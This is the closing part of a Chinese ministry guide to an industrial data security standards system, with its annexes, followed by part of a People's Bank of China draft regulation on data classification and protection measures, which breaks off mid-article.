共性、安全管理、技术和产品、安全评估与产业评价、新兴 融合领域、工业细分行业六个子体系内容。基础共性、安全 管理、技术和产品、安全评估与产业评价子体系聚焦工业领 域具有共性的数据安全标准,新兴融合领域、工业细分行业 等两个子体系重点突出特定业务场景的数据安全标准。 其中,基础共性标准用于明确工业数据安全术语,包括 术语定义、分类分级规则、识别认定、分级防护标准,为各 — 2 — 类标准研制提供基础支撑。安全管理标准用于开展数据安全 风险监测与应急处置、数据处理安全和组织人员管理,提供 了覆盖数据全生命周期的安全管理措施保障。技术和产品标 准包括数据分类分级、数据安全防护、数据行为防控、数据 共享安全技术、产品标准,建立了工业领域数据安全的技术 支撑体系。安全评估与产业评价标准用于支撑工业数据安全 评估及数据安全产业评价工作,为相关数据安全评估与产业 评价提供了标准依据。新兴融合领域标准旨在解决重点领域 的数据安全问题,包括智能制造、工业互联网领域数据安全 标准。工业细分行业标准面向重点工业行业、领域的数据特 点和安全需求,制定行业数据安全管理和技术标准规范。工 业领域数据安全标准体系框架如图 1 所示。 — 3 — 图 1 工业领域数据安全标准体系框架 — 4 — (二)重点领域 1.基础共性标准 基础共性标准是数据安全保护的基础性、通用性、指导 性标准,包括术语定义、分类分级规则、识别认定、分级防 护标准。基础共性标准子体系如图 2 所示。 图 2 基础共性标准子体系 1.1 术语定义 术语定义用于规范工业领域数据安全相关概念,为其他 标准的制定提供支撑,包括技术、规范、应用领域的相关术 语、概念定义、相近概念之间的关系。 1.2 分类分级规则 分类分级规则标准用于指导工业数据处理者开展工业 数据分类分级工作。 1.3 识别认定 识别认定标准用于指导工业数据处理者开展重要数据 — 5 — 识别和认定工作。 1.4 分级防护 分级防护标准用于指导工业数据处理者根据工业数据 分类分级和识别认定结果,采取有针对性地防护措施。 2.安全管理标准 安全管理标准从数据安全框架的管理视角出发,指导工 业数据处理者落实法律法规以及行业主管部门的管理要求, 包括安全运营、数据处理安全、组织人员管理标准。安全管 理标准子体系如图 3 所示。 图 3 安全管理标准子体系 — 6 — 2.1 安全运营 安全运营标准用于规范工业领域安全运营,主要包括工 业领域数据安全风险监测预警、监测接口、事件管理、事件 分类分级、应急演练、应急预案与处置、信息上报与共享、 数据容灾备份管理等标准。 2.2 数据处理安全 数据处理安全标准用于规范工业数据使用、共享、出境 处理活动安全要求,其中数据使用包括数据收集、传输、存 储、使用加工方面安全要求,数据共享包括提供、公开、转 移、委托处理方面安全要求。 2.3 组织人员管理 组织人员管理标准用于加强工业数据处理者组织机构 建设,规范工业数据处理岗位和人员安全管理,推动组织和 人员数据安全意识与能力提升,主要包括组织机构管理、关 键岗位人员管理、数据安全从业人员能力要求标准。 3.技术和产品标准 技术和产品标准对数据安全关键技术和产品及其检测 要求进行规范,包括数据分类分级、数据安全防护、数据行 为防控、数据共享安全技术、产品标准。技术和产品标准子 体系如图 4 所示。 — 7 — 图 4 技术和产品标准子体系 3.1 数据分类分级技术和产品 数据分类分级技术和产品标准用于规范数据资产发现、 识别、标识、分析方面的技术、产品要求,主要包括数据分 类分级、数据血缘分析、数据质量管理标准。 3.2 数据安全防护技术和产品 数据安全防护技术和产品标准用于规范数据收集、存 储、使用、加工、传输、销毁方面技术、产品要求,主要包 括数据防篡改、数据加密、数据脱敏、数据防泄漏、数据销 毁、数据恢复标准。 3.3 数据行为防控技术和产品 数据行为防控标准用于规范数据处理异常行为识别、监 测、态势感知、安全审计、数据访问控制方面的技术、产品 要求,主要包括用户行为分析、数据流转监测、数据安全态 势感知、安全审计、数据访问控制、可信执行环境标准。 — 8 — 3.4 数据共享安全技术和产品 数据共享安全技术和产品标准用于规范数据提供、公开 方面技术、产品要求,主要包括数据溯源、多方安全计算、 联邦学习、同态加密标准。 4.安全评估与产业评价标准 安全评估与产业评价标准用于支撑工业领域数据安全 评估及产业评价,包括安全评估、产业评价标准。安全评估 与产业评价标准子体系如图 5 所示。 图 5 安全评估与产业评价标准子体系 — 9 — 4.1 安全评估 安全评估标准用于指导评估机构开展数据安全风险评 估、能力评估、出境安全评估工作,主要包括工业领域数据 安全风险评估、数据安全能力评估、数据出境安全评估标准。 4.2 产业评价 产业评价标准用于数据安全产业、数据安全服务能力及 产业竞争力评价,包括数据安全产业评价指标、数据安全服 务机构能力评价、数据安全产业竞争力评价标准。 5.新兴融合领域标准 新兴融合领域标准主要用于规范工业相关新兴融合领 域的数据安全要求,包括智能制造、工业互联网领域数据安 全标准。新兴融合领域标准子体系如图 6 所示。 — 10 — 图 6 新兴融合领域标准子体系 5.1 智能制造数据安全标准 智能制造数据安全标准用于规范智能制造场景下的数 据安全,包括智能装备、智能工厂、智能服务、智能赋能技 术、智慧供应链数据安全标准。 5.2 工业互联网数据安全标准 工业互联网数据安全标准用于规范工业互联网场景下 的数据安全,包括工业互联网终端和网络、工业互联网标识 解析、工业互联网边缘计算、工业互联网平台、工业互联网 典型应用数据安全标准。 — 11 — 6.工业领域细分行业标准 根据基础共性、安全管理、技术和产品、安全评估与产 业评价标准,结合原材料、装备、消费品、电子信息制造、 民爆、节能与综合利用、软件和信息技术服务等重点工业行 业、领域数据特点和安全需求,制定工业领域细分行业数据 安全标准。工业领域细分行业标准子体系如图 7 所示。 图 7 工业领域细分行业标准子体系 6.1 原材料工业 针对原材料工业中钢铁、有色、稀土、石化化工、建材 等行业的数据安全特点、场景,提出原材料工业各行业数据 分类分级、重要数据识别、数据安全防护重点标准。 6.2 装备工业 针对装备工业中汽车、民用飞机、民用船舶等行业的数 据安全特点、场景,提出装备工业各行业数据分类分级、重 要数据识别、数据安全防护重点标准。 — 12 — 6.3 消费品工业 针对消费品工业中轻工、纺织等行业的数据安全特点、 场景,提出消费品工业各行业数据分类分级、重要数据识别、 数据安全防护重点标准。 6.4 电子信息制造业 针对电子信息制造业的数据安全特点、场景,提出电子 信息制造业数据分类分级、重要数据识别、数据安全防护重 点标准。 6.5 民爆 针对民爆行业的数据安全特点、场景,提出民爆行业数 据分类分级、重要数据识别、数据安全防护重点标准。 6.6 节能与综合利用 针对工业领域节能与综合利用相关领域的数据安全特 点、场景,提出节能与综合利用数据分类分级、重要数据识 别、数据安全防护重点标准。 6.7 软件和信息技术服务业 针对软件和信息技术服务业的数据安全特点、场景,提 出软件和信息技术服务业数据分类分级、重要数据识别、数 据安全防护重点标准。 三、组织实施 一是加强统筹协调。工业和信息化部统筹推进工业领域 数据安全标准体系建设,组织开展国家标准和行业标准制修 订工作,鼓励支持开展高质量团体标准、企业标准制定与实 施。加强各标准组织的协作配合以及各行业、各领域之间的 — 13 — 协同推进。 二是加快任务落实。汇聚工业领域产学研用各方力量, 大力推进重点急需标准研制。注重工业领域数据安全标准化 工作与新技术新应用及行业优秀实践的有机融合,建立完善 标准试验验证平台与环境,提升标准的实用性。紧密围绕技 术和产业发展趋势,适时修订标准体系和相关标准。 三是强化宣贯实施。鼓励各地主管部门、有关行业协会、 联盟、标准化技术组织、专业机构通过多种渠道宣传工业领 域数据安全标准化成果,有针对性地开展专题培训,引导企 业开展贯标达标工作,推动标准落地实施和应用推广。 四是加强国际合作。积极与国外数据安全、工业互联网、 智能制造相关组织开展标准化交流与合作,支持企事业单位 参与国际电信联盟(ITU)、国际标准化组织(ISO)、国际 电工委员会(IEC)国际标准化活动,推动相关国际标准制 定。 附件:1.工业领域数据安全现行及在研标准明细表 2.工业领域数据安全标准拟研制重点方向 — 14 — 附件 1 工业领域数据安全现行及在研标准明细表 总序号 分序号 标准名称 标准号/计划号 状态 A 基础共性 AB 分类分级规则 1. 1) 信息安全技术 数据分类分级规则 20220787-T-469 制定中 C 技术和产品 CA 数据分类分级技术和产品 CAC 数据质量管理 2. 1) 工业数据质量 通用技术规范 GB/T 39400-2020 已发布 D 安全评估与产业评价 DA 安全评估 DAA 风险评估 3. 1) 信息安全技术 数据安全风险评估方法 20230257-T-469 制定中 DAB 能力评估 4. 1) 信息安全技术 数据安全能力成熟度模型 GB/T 37988-2019 已发布 F 工业领域细分行业 FB 装备工业 FBA 汽车行业数据安全 5. 1) 汽车整车信息安全技术要求 20214422-Q-339 制定中 6. 2) 智能网联汽车 数据通用要求 20213606-T-339 制定中 FBB 民用飞机行业数据安全 7. 1) 无人机云系统数据规范 MH/T 2011-2019 已发布 FD 电子信息制造业 — 1 — 总序号 分序号 标准名称 标准号/计划号 状态 8. 1) 可穿戴产品数据规范 GB/T 37037-2018 已发布 FG 软件和信息技术服务业 9. 1) 信息技术服务 数据资产 管理要求 GB/T 40685-2021 已发布 10. 2) 面向公有云服务的文件数据安全标记规范 YD/T 3470-2019 已发布 11. 3) 云服务用户数据保护能力评估方法 第 1 部分:公有云 YD/T 3797.1-2021 已发布 12. 4) 云服务用户数据保护能力评估方法 第 2 部分:私有云 YD/T 3797.2-2020 已发布 — 2 — 附件 2 工业领域数据安全标准拟研制重点方向 A 基础共性 AA 术语定义 工业领域数据安全术语 AB 分类分级规则 工业领域数据分类分级指南、标识规则 AC 识别认定 工业领域重要数据识别指南 AD 分级防护 工业企业数据安全防护要求 B 安全管理 BA 安全运营 BAA 监测预警 工业领域数据安全监测预警实施指南、监测接口规范 BAB 应急处置 工业领域数据安全事件分类分级指南、事件管理指南、应急演练指南、应急预案与处置 要求 BAC 信息上报和共享 工业领域数据安全风险信息上报和共享指南、风险信息上报和共享接口规范 BAD 数据容灾备份管理 工业领域数据灾备管理要求 BB 数据处理安全 BBA 数据使用安全 工业领域数据使用安全要求 BBB 数据共享安全 工业领域数据共享安全要求、接口安全要求 BBC 数据出境安全 工业领域数据出境安全要求 BC 组织人员管理 — 1 — BCA 组织机构管理 工业领域数据安全组织机构建设指南 BCB 人员管理 工业领域数据处理关键岗位及人员安全管理要求、从业人员能力基本要求、管理人员能 力要求、评估人员能力要求 C 技术和产品 CA 数据分类分级技术和产品 CAA 数据分类分级 数据分类分级产品技术要求和测试评价方法 CAB 数据血缘分析 数据血缘分析技术要求 CAC 数据质量管理 数据清洗比对技术要求 CB 数据安全防护技术和产品 CBA 数据防篡改 数据防篡改产品技术要求和测试评价方法 CBB 数据加密 数据加密产品技术要求和测试评价方法 CBC 数据脱敏 数据脱敏产品技术要求和测试评价方法 CBD 数据防泄漏 数据防泄漏产品技术要求和测试评价方法 CBE 数据销毁 数据销毁产品技术要求和测试评价方法 CBF 数据恢复 数据恢复产品技术要求和测试评价方法 CC 数据行为防控技术和产品 CCA 用户行为分析 数据异常行为识别技术要求 CCB 数据流转监测 数据安全监测技术要求 — 2 — CCC 数据安全态势感知 数据安全态势感知技术要求 CCD 安全审计 数据安全审计产品技术要求和测试评价方法 CCE 数据访问控制 数据访问控制产品技术要求和测试评价方法 CCF 可信执行环境 可信执行环境技术要求 CD 数据共享安全技术和产品 CDA 数据溯源 数据追踪溯源技术要求 CDB 多方安全计算 多方安全计算技术要求 CDC 联邦学习 联邦学习技术要求 CDD 同态加密 同态加密技术要求 D 安全评估与产业评价 DA 安全评估 DAA 风险评估 工业领域数据安全风险评估指南 DAB 能力评估 工业企业数据安全能力评估指南 DAC 出境评估 工业领域数据出境安全评估指南 DB 产业评价 DBA 产业评价指标 数据安全产业评价指标 DBB 服务能力评价 数据安全服务机构能力评价、数据安全服务能力要求 — 3 — DBC 产业竞争力评价 数据安全产业竞争力评价 E 新兴融合领域 EA 智能制造数据安全 EAA 智能装备数据安全 智能装备数据安全要求、工业控制系统数据安全要求 EAB 智能工厂数据安全 智能工厂数据安全要求 EAC 智能服务数据安全 大规模个性化定制数据安全要求、网络协同制造数据安全要求 EAD 智能赋能技术数据安全 工业+5G 应用数据安全要求、工业+人工智能应用数据安全要求、工业+区块链应用数据 安全要求 EAE 智慧供应链数据安全 智慧供应链数据安全要求 EB 工业互联网数据安全 EBA 终端与网络数据安全 工业互联网数据采集设备安全技术要求 EBB 标识解析数据安全 工业互联网标识解析数据安全要求 EBC 边缘计算数据安全 工业互联网边缘数据采集处理安全要求 EBD 平台数据安全 工业微服务数据安全要求、工业互联网大数据中心数据安全监测技术要求 EBE 典型应用数据安全 工业 App 数据安全要求 F 工业领域细分行业 FA 原材料工业 FAA 钢铁行业数据安全 钢铁行业重要数据识别、数据分类分级、数据安全防护实施指南 FAB 有色行业数据安全 — 4 — 有色行业重要数据识别、数据分类分级、数据安全防护实施指南 FAC 稀土行业数据安全 稀土行业重要数据识别、数据分类分级、数据安全防护实施指南 FAD 石化化工行业数据安全 石化化工行业重要数据识别、数据分类分级、数据安全防护实施指南 FAE 建材行业数据安全 建材行业重要数据识别、数据分类分级、数据安全防护实施指南 FB 装备工业 FBA 汽车行业数据安全 汽车行业重要数据识别、数据分类分级、数据安全防护实施指南 FBB 民用飞机行业数据安全 民用飞机行业重要数据识别、数据分类分级、数据安全防护实施指南 FBC 民用船舶行业数据安全 民用船舶行业重要数据识别、数据分类分级、数据安全防护实施指南 FC 消费品工业 FCA 轻工行业数据安全 轻工行业重要数据识别、数据分类分级、数据安全防护实施指南 FCB 纺织行业数据安全 纺织行业重要数据识别、数据分类分级、数据安全防护实施指南 FD 电子信息制造业 电子信息制造业重要数据识别、数据分类分级、数据安全防护实施指南 FE 民爆 民爆行业重要数据识别、数据分类分级、数据安全防护实施指南 FF 节能与综合利用 节能与综合利用重要数据识别、数据分类分级、数据安全防护实施指南 FG 软件和信息技术服务业 软件和信息技术服务业重要数据识别、数据分类分级、数据安全防护实施指南 — 5 —
standards
中国人民银行业务领域数据安全管理办法 (征求意见稿) 第一章 总则 第一条(目的和依据)为规范中国人民银行业务领域数 据的安全管理,根据《中华人民共和国网络安全法》《中华 人民共和国数据安全法》 《中华人民共和国中国人民银行法》 等有关法律、行政法规,制定本办法。 第二条(适用范围)数据处理者在中华人民共和国境内 开展的中国人民银行业务领域数据相关的处理活动,适用本 办法。法律、行政法规或者中国人民银行另有规定的,从其 规定。 本办法所称中国人民银行业务领域数据,指根据法律、 行政法规、国务院决定和中国人民银行规章,开展中国人民 银行承担监督管理职责的各类业务活动时,所产生和收集的 不涉及国家秘密的网络数据,以下简称数据。 第三条(管理原则与目标)数据安全工作遵循“谁管业 务,谁管业务数据,谁管数据安全”基本原则。开展数据处 理活动应当履行数据安全保护义务,采取有效措施防范数据 被篡改、破坏、泄露、不当获取与利用等风险,确保不损害 国家安全、公共利益、金融秩序、个人及组织合法权益,遵 1 守社会公德伦理、商业道德和职业道德。 第四条(协同监督管理)在国家数据安全工作协调机制 统筹协调下,中国人民银行及其分支机构,依据本办法开展 数据安全监督管理工作,积极支持其他有关主管部门依据职 责开展数据安全监督管理工作,必要时可以与其他有关主管 部门签署合作协议,进一步约定数据安全监督管理协作模 式。 中国银行间市场交易商协会、中国支付清算协会、中国 互联网金融协会等金融行业协会应当加强自律管理,建立便 捷的投诉、举报渠道,反映会员合理的数据安全意见建议。 第二章 数据分类分级 第五条(数据分类分级保护总体规划)中国人民银行负 责组织制定数据分类分级相关行业标准,指导数据处理者开 展数据分类分级各项工作,统筹确定重要数据具体目录并实 施动态管理。 第六条(数据分类分级制度规程)数据处理者应当建立 健全本单位数据分类分级实施制度,规范分类分级工作操作 规程。数据分类分级过程实施和结果审批,应当严格遵循操 作规程。 第七条(数据分类要求)数据处理者应当参考行业标 2 准,根据业务开展情况建立业务分类,梳理细化数据资源目 录,标识各数据项是否为个人信息、数据来源(生产经营加 工产生、外部收集产生等)、存储该数据项的信息系统清单 和应用的业务类别。 第八条(数据分级要求)数据按照精度、规模和对国家 安全的影响程度,分为一般、重要、核心三级。在中国人民 银行组织下,数据处理者应当准确识别判定本单位信息系统 存储的全量数据是否属于重要数据、核心数据,并填写报送 重要数据目录内容,由中国人民银行汇总后确定重要数据具 体目录。数据处理活动中,数据处理者还应当及时准确识别 判定所涉及数据是否属于重要数据、核心数据。 第九条(数据敏感性分层级)在数据分级基础上,数据 处理者应当参考行业标准,根据数据遭到泄露或者被非法获 取、非法利用时,可能对个人、组织合法权益或者公共利益 等造成的危害程度,将数据项敏感性从低至高进一步分为一 至五共五个层级。结构化数据项应当逐一标识层级;非结构 化数据项应当优先按照可拆分的各结构化数据项所对应最 高层级,标识其层级。 第十条(数据可用性分层级)数据可用性分层级工作纳 入信息系统业务连续性分级保障体系统一考虑。数据处理者 应当评估信息系统存储数据遭到篡改、破坏后可能对业务连 续性造成的影响程度,明确恢复点目标要求。恢复点目标越 3 严格,数据的可用性层级越高。在此基础上,鼓励数据处理 者识别用于支撑最基本业务运转、无法承受彻底灭失风险、 需要进一步进行容灾备份的数据。 第十一条(动态更新要求)数据处理者应当根据数据和 信息系统变化情况,每年组织更新数据资源目录,避免信息 系统所涉及数据项未在数据资源目录中记录、数据项标识信 息不完整等情形发生。 第三章 数据安全保护总体要求 第十二条(责任落实总体要求)数据处理者应当明确其 数据安全管理相关内设部门职责分工,配备足够数量的数据 安全管理人员,并细化各类违规数据处理活动的定责问责规 程,压实数据安全保护责任。重要数据的处理者还应当书面 明确数据安全负责人和数据安全牵头管理内设部门。 第十三条(全流程安全管理制度要求)数据处理者应当 建立健全全流程数据安全管理制度,结合数据分类分级结 果,明确差异化的安全保护管理和技术措施要求,并制定数 据处理活动操作规程,规范各类内部审批和授权流程。第五 层级数据项应当在第四层级数据项对应的安全保护管理和 技术措施基础上进一步从严管理。不同敏感性层级数据项在 同一个数据处理活动中被处理,且难以采取差异化安全保护 4 管理和技术措施的,应当统一采取最高敏感性层级数据项对 应的安全保护管理和技术措施。与母公司、子公司、关联公 司或者附属公司等具有关联关系的数据处理者合作开展数 据处理活动时,不得降低安全保护管理和技术措施要求。 第十四条(安全培训总体要求)数据处理者应当根据岗 位分工,制定数据安全年度培训计划,组织开展相关教育培 训,并对培训结果进行评价。培训内容应当包括: (一) 数据安全相关法律、行政法规、部门规章、国家 和金融行业标准、内部规定、行为准则和职业操守; (二) 不同岗位的数据安全责任,失职失责或者违法违 规数据处理活动应当承担的后果; (三) 针对性的数据安全保护管理和技术措施要求,以 及对应的操作规程; (四) 数据安全事件应急处置规程。 第十五条(鼓励创新)鼓励数据处理者积极开展数据安 全技术创新应用,在保障安全合规前提下,积极促进数据的 高效流通和创新应用,鼓励优秀创新成果申报行业表彰奖 励。 第四章 数据安全保护管理措施 第十六条(人员管理要求)数据处理者应当按照最小必 5 要和职责分离原则,严格管理信息系统各类业务处理账号、 数据库管理员等特权账号的设立和权限,人员变动时应当及 时调整权限或者收回账号。 数据处理者应当加强账号身份认证管理,可使用第二层 级以上数据项的账号应当支持身份验证。可使用第三层级以 上数据项的账号应当支持多因素认证或者实现二次授权,相 关账号使用人员应当签署保密协议。 第十七条(数据收集保护管理措施要求)数据处理者收 集数据应当遵循合法、正当原则,并采取下列安全保护管理 措施: (一)除法律、行政法规明确无需说明的情形外,应当 在隐私政策协议或者合同协议中以显著方式、清晰易懂的语 言说明数据收集的目的、范围、方式、存储期限,以及数据 来源不合法、数据不真实情形对应的违约责任; (二)接受其他数据处理者委托协助收集数据时,应当 通过合同协议与其约定,是否需要代其向相关个人、组织说 明委托关系; (三)非直接面向个人、组织收集数据时,应当要求数 据提供方依照法律、行政法规取得个人、组织的同意,对于 非书面同意情形,应当要求其出具数据来源说明材料,并依 据材料评估其合法性、真实性; (四)应当针对数据合法性、真实性存疑等情形,明确 6 业务暂停使用相关数据时的应急处置方案; (五)应当优先采用数据提供方直接录入或者信息系 统间交互的方式收集数据; (六)因履行无障碍义务或者客观条件限制,采用纸质 文件、影像或者代为手工录入等方式收集数据时,应当采取 自动识别、人工核验等措施,保障数据录入的及时性和准确 性,并按照档案管理要求保存原始数据收集凭证; (七)停止提供其产品服务,合同协议履约终止或者响 应个人、组织合法权益要求时,应当主动停止数据收集活动; (八)保存数据收集行为对应的合同协议、内部审批记 录、数据提供方出具的数据来源说明材料和对应评估结论等 信息至少三年。 第十八条(数据存储保护管理措施要求)数据处理者应 当根据业务需要,明确数据存储期限。除履行法定职责或者 法定义务所必需外,第三层级以上数据项原则上不得在终端 设备和移动介质中存储。确需存储的,数据处理者在履行内 部审批程序基础上,应当统一明确需在终端设备和移动介质 中存储的特定场景、支持此类场景的必要性、应当采取的风 险防范措施,并据此开展。风险防范措施至少应当包括仅在 授权的终端设备和移动介质中存储,存储期限不得超过审批 允许的期限。 数据处理者应当保存终端设备、移动介质中存储第三层 7 级以上数据项行为的目的说明、内部审批记录、授权设备或 者介质识别编号、允许存储期限等信息至少三年。 第十九条(数据使用保护管理措施要求)第三层级数据 项原则上不提供导出使用方式,第四层级以上数据项原则上 仅提供核验使用方式,确需提供其他使用方式时,应当说明 相关必要性,经内部审批并明确对应的风险防范措施后,据 此开展。涉及第三层级以上数据项导出使用的风险防范措 施,原则上应当优先采取加密、数字水印或者脱敏处理等安 全保护措施,确需未经安全保护即导出的,数据处理者应当 统一明确相关导出需求场景,并据此开展。 除面向个人、组织展示其数据,履行法定职责或者法定 义务必需展示数据的两类情形外,信息系统界面展示第三层 级以上数据项时,原则上应当优先实施脱敏处理后再展示。 确需明文展示的,数据处理者应当统一明确相关展示需求场 景、支持此类场景的必要性和应当采取的风险防范措施,并 据此开展。 第二十条(数据加工保护管理措施要求)数据加工前, 数据处理者应当审查加工目的与收集约定是否一致,确保数 据加工不以垄断经营和不正当竞争为目的,不发生误导、欺 诈、胁迫或者干扰等限制个人或者组织正当选择与决策的行 为,遵循社会公德伦理。第四层级以上数据项加工,应当经 内部审批并明确对应的风险防范措施后,据此开展。 8 基于加工生成的数据项面向个人提供自动化决策服务 时,应当以适当方式说明加工目的、加工依赖数据基本情况 和加工基本逻辑,提升决策的透明度。 数据处理者应当保存数据加工行为目的说明、内部审查 审批记录、审查对应的加工应用程序源代码、新产生数据项 列表等信息至少三年。 第二十一条(促进数据开发利用)使用第三层级以上数 据项加工后产生的数据项,经评估确认无法识别至特定个 人、组织,或者反映信息敏感程度明显低于原数据项时,数 据处理者履行内部审批手续后,可视情降低敏感性层级,促 进数据依法合规开发利用。 第二十二条(数据传输保护管理措施要求)除履行法定 职责或者法定义务所必需外,数据处理者原则上不得采用互 联网邮件、即时通讯、在线文件传输、交互性信息服务等互 联网信息服务或者通过移动介质交换传输第三层级以上数 据项,确有需要的,数据处理者应当统一明确相关传输需求 场景、支持此类场景的必要性和应当采取的风险防范措施, 并据此开展。 第二十三条(一般性数据提供保护管理措施要求)数据 处理者应当针对自身业务开展所需的数据提供行为采取下 列安全保护管理措施: (一)涉及个人信息的数据提供行为,应当评估确认遵 9 守有关法律、行政法规的规定。其他数据提供行为,应当评 估确认不违反与相关组织间事前约定的有关保守商业秘密 要求; (二)通过合同协议方式与数据接收方约定数据提供 的目的、方式、范围、规模、允许存储时限、将数据再转移 提供至第三方的限定条件,要求接收方及时告知可能发生的 数据泄露事件,明确各方数据安全保护责任和至少应当采取 的安全保护措施; (三)向个人、组织提供其数据时,可视情简化合同协 议签订和对应内部审批要求,但应当先行核实其身份的真实 性; (四)对于委托处理情形,在合同协议中进一步明确委 托处理受托人重要事项报告、及时返还和删除数据的实施方 式、接受并配合数据处理者监督其委托处理活动等义务; (五)有效监督委托处理受托人履约情况,定期评估确 认其数据处理活动符合事前约定,并已采取承诺的全部安全 保护措施; (六)对于委托处理以外情形,第三层级数据项应当优 先通过查询、固定报表和核验方式向其他数据处理者提供, 第四层级以上数据项应当优先通过核验方式向其他数据处 理者提供,确需以其他方式提供的,在履行内部审批程序基 础上,数据处理者应当统一明确相关提供需求场景、支持此 10 类场景的必要性和应当采取的风险防范措施,并据此开展; (七)切实保障提供数据的质量,对提供数据真实性作 必要核验,按照约定格式做好数据清洗转换,不得提供虚假 数据误导数据接收方、合作方; (八)保存数据提供行为评估记录、内部审批记录、对 应的合同协议内容、监督过程中识别的风险及整改处置情况 等信息至少三年。 第二十四条(特殊性数据提供保护管理措施要求)数据 处理者向其他数据处理者提供重要数据前,应当依照法律、 行政法规要求,说明重要数据的具体信息,从数据接收方数 据处理目的方式和范围的合法正当必要性、潜在安全隐患、 数据接收方诚信守法和背景情况、合约协议完备性和拟采取 的安全保护管理和技术措施等方面做好风险评估并保存报 告至少三年。在此基础上,数据处理者还应当通过法律、行 政法规明确规定的安全评估。 数据处理者向其他数据处理者提供核心数据前,还应当 提请国家数据安全工作协调机制办公室批准。除履行法定职 责或者法定义务所明确情形外,数据处理者不得通过拆分等 方式规避上述义务。 数据处理者因合并、分立、解散、被宣告破产等原因需 要转移数据的,应当通过公告等方式将数据接收方信息告知 相关个人、组织,并评估确认不违反与相关组织间事前约定 11 的有关保守商业秘密要求。重要数据的处理者发生合并、分 立、解散或者申请重整、和解以及破产清算等情况时,法律、 行政法规有明确要求的,应当事前向中国人民银行报告重要 数据处置方案和数据接收方基本情况。 第二十五条(数据融合创新应用管理措施要求)数据处 理者采用隐私计算等技术促进数据融合创新应用时,应当确 认原始数据未离开自身控制范围,且多个数据提供行为关联 后,暴露约定范围外信息的风险可控。 第二十六条(数据出境限制管理措施要求)数据处理者 在中华人民共和国境内收集和产生的数据,法律、行政法规 有境内存储要求的,应当在境内存储。 数据处理者因自身需要向境外提供数据,存在国家网信 部门规定情形的,应当严格遵守其有关规定事前开展数据出 境风险自评估并申报数据出境安全评估。数据处理者不得有 意拆分、缩减出境数据规模以规避申报数据出境安全评估。 对于因自身需要的数据出境提供行为,数据处理者应当 于每年 1 月底前测算或者估算其上两年内累计出境数据规模 与范围,并保存测算估算结果和对应的境外接收方联系方式 至少三年。涉及数据出境安全评估的,数据处理者还应当保 存有效期内的数据出境风险自评估报告、数据出境安全评估 申报书和评估结果。 第二十七条(国际组织和外国金融管理部门数据调取) 12 中国人民银行根据有关法律和中华人民共和国缔结或者参 加的国际条约、协定,或者按照平等互惠原则,处理国际组 织和外国金融管理部门关于提供数据的请求。非经中国人民 银行和其他有关主管部门批准,数据处理者不得向其提供境 内存储的数据。 第二十八条(数据公开保护管理措施要求)数据处理者 应当履行内部审批手续,审核数据公开行为的目的、数据内 容范围、渠道、时限和脱敏处理情况,分析研判可能产生的 负面影响,并核验数据的合法性、真实性与有效性。数据公 开渠道原则上应当为本单位统一明确的官方渠道。确有需要 通过其他渠道公开的,应当经内部审批并明确对应的风险防 范措施后,据此开展。 第二层级以上数据项公开时,数据处理者应当保存数据 公开行为目的说明、日期、公开渠道、数据范围和内部审批 记录等信息至少三年。 第三层级以上数据项原则上应当实施脱敏处理后再公 开,数据处理者应当统一明确第三层级以上数据项确需未经 脱敏处理即允许公开的特定需求场景、支持此类场景的必要 性和应当采取的风险防范措施,并据此开展。 第二十九条(数据删除保护管理措施要求)涉及个人信 息的数据,满足法律、行政法规规定应当删除情形时,数据 处理者应当主动删除数据。其他数据已超过与组织约定的存 13 储时限,或者组织提出符合法律、行政法规规定的正当请求 时,数据处理者应当主动删除数据。删除数据从技术上难以 实现的,数据处理者应当停止除存储和采取必要的安全保护 措施之外的处理。数据处理者应当每年至少对信息系统业务 处理账号、特权账号实施一次核验,确认已停止除存储和必 要安全保护措施之外处理的数据,不可被访问使用。 数据处理者发生解散、被宣告破产等情况时,合法合规 完成自身需要的数据转移处理后,应当及时销毁全部数据存 储介质。中国人民银行或其住所地分支机构依据法律、行政 法规另有数据转移要求的,还应当按照要求将数据转移至指 定接收方后再销毁数据存储介质。 第五章 数据安全保护技术措施 第三十条(账号权限保护技术措施要求)数据处理者应 当采取有效技术措施,从严管控业务处理账号的数据使用权 限,鼓励建设技术平台,采取统一认证、统一授权策略进一 步加强管控。 数据处理者应当统一明确特权账号的使用场景,并通过 内部审批授权,严格限定其使用。可使用第三层级以上数据 项的特权账号,涉及人工操作的数据库表删除、修改等操作 应当逐一进行事前审查和事后审计。 14 第三十一条(数据处理活动日志保护技术措施要求)数 据处理者应当建立统一的日志规范,明确数据处理活动日志 应当完整记录的溯源所需信息。第三层级数据项如需在数据 处理活动日志中记录原则上应当实施脱敏处理,第四层级以 上数据项原则上不记录。确有需要的,数据处理者应当统一 明确相关日志记录需求场景、支持此类场景的必要性和应当 采取的风险防范措施,并据此开展。 数据处理者应当将数据处理活动日志纳入数据分类分 级管理,并落实对应的管理和技术措施要求。数据处理者应 当妥善保存数据处理活动日志至少六个月。向其他数据处理 者提供涉及个人信息的数据或者重要数据的行为,相关日志 应当保存至少三年。 第三十二条(数据收集保护技术措施要求)采用直接录 入方式收集第二层级以上数据项,应当核验录入人身份。采 用信息系统间交互方式收集第三层级以上数据项,应当对数 据提供方身份进行认证,并保障收集数据的完整性。 数据处理者应当采取关联信息交叉核验等技术措施,识 别并规避数据项同一内容不合理映射至多个个人或者组织、 不同数据项信息相互矛盾等问题,尽可能保障收集数据的准 确性,避免损害个人、组织的合法权益。 数据处理者面向个人直接录入方式收集数据时,应当建 立健全技术措施,识别法律、行政法规禁止发布或者传输的 15 信息。 数据处理者采用自动化搜集方式从其他数据处理者收 集数据时,应当遵守其数据访问控制协议,不得干扰其网络 服务正常运行,不得侵害其原有网络服务合法运营权益。 第三十三条(数据存储保护技术措施要求)数据处理者 应当针对数据存储行为采取下列安全保护技术措施: (一)有效隔离开发测试环境与生产环境数据存储设 施设备; (二)存储重要数据或者一百万人以上个人信息的信 息系统应当落实三级以上网络安全等级保护要求,存储核心 数据的信息系统应当落实四级网络安全等级保护要求或者 关键信息基础设施保护要求; (三)除因业务影响、产业制约,并可提供详细分析报 告情形外,应当优先采用商用密码技术对信息系统中第三层 级以上数据项实施加密存储,结构化数据项在对数据库文件 整体实施加密基础上鼓励进一步采用更细粒度的加密方式, 非结构化数据项可仅对拆分的第三层级以上结构化数据项 单独实施加密; (四)按照业务连续性保障等级,加强信息系统数据冗 余备份管理,对于恢复点目标要求小于十分钟的信息系统, 每天至少验证一次最新冗余备份数据可被正常加载使用;对 于其他信息系统应当逐一明确验证频率要求,据此定期验证 16 最新冗余备份数据可被正常加载使用。 鼓励数据处理者针对需要进一步容灾备份的数据,采取 